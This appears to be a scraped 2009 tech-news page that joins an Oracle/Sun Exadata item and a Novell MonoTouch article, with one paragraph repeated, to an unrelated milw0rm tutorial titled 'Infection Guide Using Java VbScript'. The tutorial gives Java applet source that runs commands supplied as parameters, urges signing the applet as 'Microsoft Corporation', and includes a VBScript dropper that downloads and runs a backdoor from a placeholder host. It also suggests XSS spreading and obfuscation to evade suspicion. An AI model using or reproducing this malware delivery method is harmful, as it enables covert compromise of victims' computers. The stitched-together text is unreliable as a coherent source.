Friday, September 18, 2009

Oracle Unveils Database Machine Made With Sun Micro (ORCL,JAVA,HP)

Oracle (NASDAQ:ORCL) unveiled a new version of its database machine that used its own software and hardware from Sun Microsystems (NASDAQ:JAVA) on Tuesday, according to an AP report. Previous versions of the Exadata machine were made in collaboration with Hewlett-Packard (NYSE:HPQ), but Oracle confirmed that it is no longer making machines with that company. Oracle's $7.4 billion acquisition of Sun is currently being held up by an EU investigation of the deal's implications.

Thursday, September 17, 2009

Novell Brings .NET Development to the iPhone

Novell has announced the commercial release of MonoTouch 1.0, a solution for developing applications for the iPhone and iPod Touch using the Microsoft .NET framework, including C# and other .NET programming languages.

Novell has announced the commercial release of MonoTouch 1.0, a solution for developing applications for the iPhone and iPod Touch using the Microsoft .NET framework, including C# and other .NET programming languages.

Novell officials touted the new technology as a liberating concept for iPhone application developers, because developers have primarily built iPhone applications using C and Objective-C, putting iPhone development beyond the reach of most .NET developers. With MonoTouch, the creativity of millions of .NET developers worldwide can be unleashed to build a vast array of iPhone applications, Novell said.

In an interview with eWEEK, Miguel de Icaza, vice president of developer platform at Novell and founder of the Mono open-source project, said, “We want to do what Eclipse did for the Java community, but for the .NET community.”

MonoTouch was developed by the Mono Project team and it simplifies iPhone development by allowing developers to utilize code and libraries written for the .NET development framework and programming languages such as C#, IronRuby and IronPython. Individual .NET developers and independent software vendors (ISVs) can now sell their products into a massive new market, while corporate developers and IT organizations can deploy their applications in a new mobile computing environment.

The iPhone developer program license restricts developers from distributing scripting engines or Just-In-Time (JIT) compilers, which are required by managed runtimes such as .NET for code execution. As a result, the world of iPhone applications had been previously closed to .NET and Mono developers. Developers can now use MonoTouch while fully complying with these license terms because MonoTouch delivers only native code.

“Developing our mobile forms solution on multiple platforms before MonoTouch from Novell was time-consuming due to the diverse technology platforms,” said Simon Guindon, mobile solution developer at TrueContext. “With MonoTouch, we can now optimize development for the future and enrich the Pronto Forms product offering at a faster pace.”

Indeed, de Icaza said when the Mono team “took a bunch of Apple [Objective-C-based] samples and rewrote them in C#, they were one-half to one-third the size they were before — meaning you use less code

The popularity of the iPhone and iPod Touch has created a huge market for iPhone applications. According to Scott Ellison, vice president of Mobile and Wireless at IDC, in its first year the Apple Apps Store had more than 50,000 available applications, and well over 1 billion downloads with an average of more than 140 new applications launched every day.

“The iPhone has experienced tremendous adoption in both consumer and business markets,” said Al Hilda, program director, Application Development Software at IDC, in a statement. “Given that applications are a key reason for the iPhone’s success, a solution that allows .NET developers to use existing skills to build iPhone applications is an exciting and consequential milestone in the evolution of mobile platforms.”

The Mono team initially started working on the MonoTouch technology in 2008 when the team began working Unity Technologies, a game maker that was working on building Mono-based games for the iPhone, de Icaza said.

In a blog post, Tom Higgins, a product evangelist for Unity, said, “Unity has helped bring the Mono framework on to both the iPhone and the Wii console.”

MonoTouch from Novell is a software development kit that contains a suite of compilers, libraries and tools for integrating with Apple’s iPhone SDK. Microsoft .NET base class libraries are included, along with managed libraries for taking advantage of native iPhone APIs, Novell said. Also included is a cross-compiler that can be used for turning .NET executable files and libraries directly into native applications for distribution on the Apple Apps Store or for deployment to enterprise iPhone users. In addition, Xcode integration enables application developers to test on the device or in Apple’s iPhone Simulator and ship applications to the Apple Apps Store for distribution.

In a blog post, de Icaza said MonoTouch consists of:

· MonoTouch.dll — The C# binding to the iPhone native APIs (the foundation classes, Quartz, CoreAnimation, CoreLocation, MapKit, Addressbook, AudioToolbox, AVFoundation, StoreKit and OpenGL/OpenAL).

· Command Line SDK to compile C# code and other CIL language code to run on the iPhone simulator or an iPhone/iPod Touch device.

· Commercial license of Mono’s runtime (to allow static linking of Mono’s runtime engine with your code).

· MonoDevelop Add-in that streamlines the iPhone development and integrates with Interface Builder to create GUI applications.

“The vast majority of Windows-centric developers, ISVs [independent software vendors] and IT organizations have chosen the C# language and .NET for development,” de Icaza said. “As such we have seen tremendous demand for tools to build .NET-based iPhone applications. We developed MonoTouch in response to this demand, giving both individual developers and businesses a solution that breaks down the barriers to iPhone application development.”

Moreover, de Icaza said MonoTouch “is probably the most sought after piece of technology in the history of the [Mono] project. Since October we have been bombarded with requests for it.”

Yet, although Mono is an open source project, MonoTouch is a commercial venture from Novell. MonoTouch Personal and Enterprise Editions are available now through http://shop.novell.com. For individuals only building applications for the Apple Apps Store, MonoTouch Personal Edition is available for $399 per developer for a one-year subscription. MonoTouch Enterprise Edition is available for $999 per developer for a one-year subscription, which includes maintenance and updates. A five-developer Enterprise license supports five concurrent developers and is available for $3,999 per year.

Infection Guide Using Java VbScript

Présentation : IGUJV - Infection Guide Using Java VbScript Hi. This is a minimalistic guide on how to infect anyone . This is not a 0day. It's a pwning method wich is one click away from the victim. It is pretty simple and the best of all it takes no time at all. And it is undetectable too if you do it right Author AnalyseR eMaiL alienyser gmail.com Greetz to DarkPaiN, Marianaki_Ki, Franko, Aragorn, __Potter__, Santa_Cruz After a few attempts to think a way to infect specific or any computer systems, i found that Java could be THE solution. I am not a Java Programmer Developer or whatever but this piece of code is pretty easy to be read by anyone who had a little programming expirience. The question how to infect someone is the hardest one, when you are coding your new backdoor trojan or whatever malware. I mean... ok, you have your new backdoor compiled. You've tested it and it works great. But how the hell can you spread it There are several methods, but nothing is invisible from the user's eye. And that's because all the well known methods are... WELL KNOWN Ok, let me go with the subject and show you how it's done. I've developed the 80pourcents of this attack at least and i say 80 because the backdoor server i use isn't made by me, and the vbscript is from a googled page. Anyway, the Java code has been written by me and the idea is also my product . So be gentle with this PpPPp. I won't explain the meaning of what does every single line of code here, because i don't want to and because you must understand by your self how it works. Any other explanation on the codes, will be useless if you can't read the source code by your self. I speak English by my self for example Pp noone teached me how it's done. It just happens. Little crappy but i hope you understand anywayz What you need to play with this method 1 The official Java compiler and the rest of Java developer tools 2 Basic HTML Java VBScripting knowledge 3 Java Runtimes 4 Web Browser 5 Hosting for the tests 6 A backdoor uploaded to your host 7 Mind 8 Coffee The process 1 Create a java file with the following code inside and name it whatever you want i faced problems with the THIRD parameter, cut it to the second one or just use it as it is. Works fine for me... . START COPY HERE import java.applet. import java.awt. import java.io. public class skata extends Applet public void init Process f String first getParameter first try f Runtime.getRuntime .exec first catch IOException e e.printStackTrace Process s String second getParameter second try s Runtime.getRuntime .exec second catch IOException e e.printStackTrace Process t String third getParameter third try t Runtime.getRuntime .exec third catch IOException e e.printStackTrace END COPY HERE 2 Compile your java applet with the java developer tools and sign it too. A good name could be Microsoft Corporation or something. 3 Upload your signed compiled applet to your host and your backdoor too. 4 Open notepad and paste the following html code. change the YOUR-JAVA-APPLET-NAME with your own java filename START COPY HERE END COPY HERE 5 Upload it as .htm to your host and browse it You will see the Java Security warning. Click RUN.... BooM Calculator and cmd spawned 6 Have in mind that THIS warning comes out in EVERY java applet you are running. EITHER A JAVA GAME or a JAVA IRC CLIENT. 7 Change the .htm code in to something like the following Take a look, it's a vbscript echoed from cmd.exe - this will download our backdoor . START COPY HERE C windows apsou.vbs echo Const adSaveCreateOverWrite 2 C windows apsou.vbs echo Dim BinaryStream C windows apsou.vbs echo Set BinaryStream CreateObject ADODB.Stream C windows apsou.vbs echo BinaryStream.Type adTypeBinary C windows apsou.vbs echo BinaryStream.Open C windows apsou.vbs echo BinaryStream.Write BinaryGetURL Wscript.Arguments 0 C windows apsou.vbs echo BinaryStream.SaveToFile Wscript.Arguments 1 , adSaveCreateOverWrite C windows apsou.vbs echo Function BinaryGetURL URL C windows apsou.vbs echo Dim Http C windows apsou.vbs echo Set Http CreateObject WinHttp.WinHttpRequest.5.1 C windows apsou.vbs echo Http.Open GET , URL, False C windows apsou.vbs echo Http.Send C windows apsou.vbs echo BinaryGetURL Http.ResponseBody C windows apsou.vbs echo End Function C windows apsou.vbs echo Set shell CreateObject WScript.Shell C windows apsou.vbs echo shell.Run C windows update.exe C windows apsou.vbs start C windows apsou.vbs http hello.world.com backdoor.exe C windows update.exe' END COPY HERE 8 Note that i use C Windows. If you want to infect win2k or vista you might want to change it to pourcentswindirpourcents or whatever you want. 9 To see the vbscript code clearly, infect your self and open C windows apsou.vbs you don't need to do it at all . 10 Change the backdoor URL on the above html code http hello.world.com backdoor.exe and the location you want to download it. 11 Fill the page with flash games, pictures, texts. This will keep the victim's mind away 12 Save your new .htm and upload.... 13 Now browse it and wait. Wait.. wait.. BOOM Backdoored. 14 You trust an irc client You can be pwned. Without to mention anything. Just by clicking run. 15 If you want some roots, you can change the above script to attack linux users only. Or you can make 2 different versions 16 Use it with XSS to infect a lot of people. 17 Use ltscript src to include the script, don't let the people see what's inside your page. Remember to change the permissions to.18 Use multiple unescape functions for your code. This will keep away any suspicious users for a while. CONCLUSION It's big mistake to think that you are safe with your new antivirus or your brand new million dollar anti-whatever system. This is not any kind of exploitation. It's just social engineering-like attack. I see 10 of these warnings every day on the net. Either i want to play a game and kill my time or whatever i want to do with a java applet. It's nothing strange or special than that. But hello, there is a hole on this. You can execute LOCAL, anything you want Tested and working under Windows XP SP2-SP3, Full Updated, Java Runtimes 5-something... Proof of concept http analyser.overflow.gr basta analyser.htm Enjoy milw0rmers.. milw0rm.com 2008-12-12